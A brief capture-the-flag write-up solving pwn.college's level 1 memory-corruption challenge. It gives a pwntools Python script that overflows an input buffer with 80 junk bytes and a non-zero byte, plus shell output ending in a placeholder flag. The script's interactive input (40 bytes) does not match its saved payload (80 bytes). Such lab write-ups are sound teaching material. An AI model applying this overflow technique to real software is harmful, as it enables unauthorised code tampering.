pwn.college Memory Corruption [level1]

Dec. 10, 2020 // echel0n

This is a very primal solution to read the flag of level 1 challenge. This challenge requires to overwrite a variable that exists in memory. Variable is set to zero by default. You have to overwrite it to something else. You can calculate where the variable exists in memory with pwn.cyclic and pwn.cyclic_find functions. In my example, it was 80 bytes after input address. So we need 80 junk bytes and (actually you can input all the way to 80 junk bytes which is not zero) 1 byte that is not 0x0. You can create the final payload like this.

  1. #!/usr/bin/env python
  2. import pwn
  3. def create_payload():
  4. f = open("payload", "wb")
  5. buffer_size = b"200\n"
  6. stonks = b"A" * 80 + b"\x01" + b"\n"
  7. itself = buffer_size + stonks
  8. f.write(itself)
  9. pwn.context.terminal = ["alacritty", "-x", "sh", "-c"]
  10. binary_itself = pwn.ELF("babymem_level1_teaching1")
  11. r = pwn.process("./babymem_level1_teaching1")
  12. epi = r.read(10000000)
  13. print(epi.decode("utf-8"))
  14. r.sendline("200")
  15. r.sendline("A"*40 + "\x01")
  16. pro = r.read(100000)
  17. print(pro.decode("utf-8"))
  18. a = input("\n\nEND?")
  19. create_payload()

Warning, sendfile() has issues. If you want to input your payload manually, do like this.

  1. $ ./binary.bin < ./payload | cat
  2. [*] '/mnt/pwn.college/mem_corrupt/level00_1/babymem_level1_testing1'
  3. Arch: amd64-64-little
  4. RELRO: Full RELRO
  5. Stack: Canary found
  6. NX: NX enabled
  7. PIE: PIE enabled
  8. [+] Starting local process './babymem_level1_testing1': pid 2057309
  9. ###
  10. ### Welcome to ./babymem_level1_testing1!
  11. ###
  12. Payload size:
  13. Send your payload (up to 200 bytes)!
  14. You win! Here is your flag:
  15. pwn_college{example_flag}
  16. Goodbye!
  17. *** stack smashing detected ***: terminated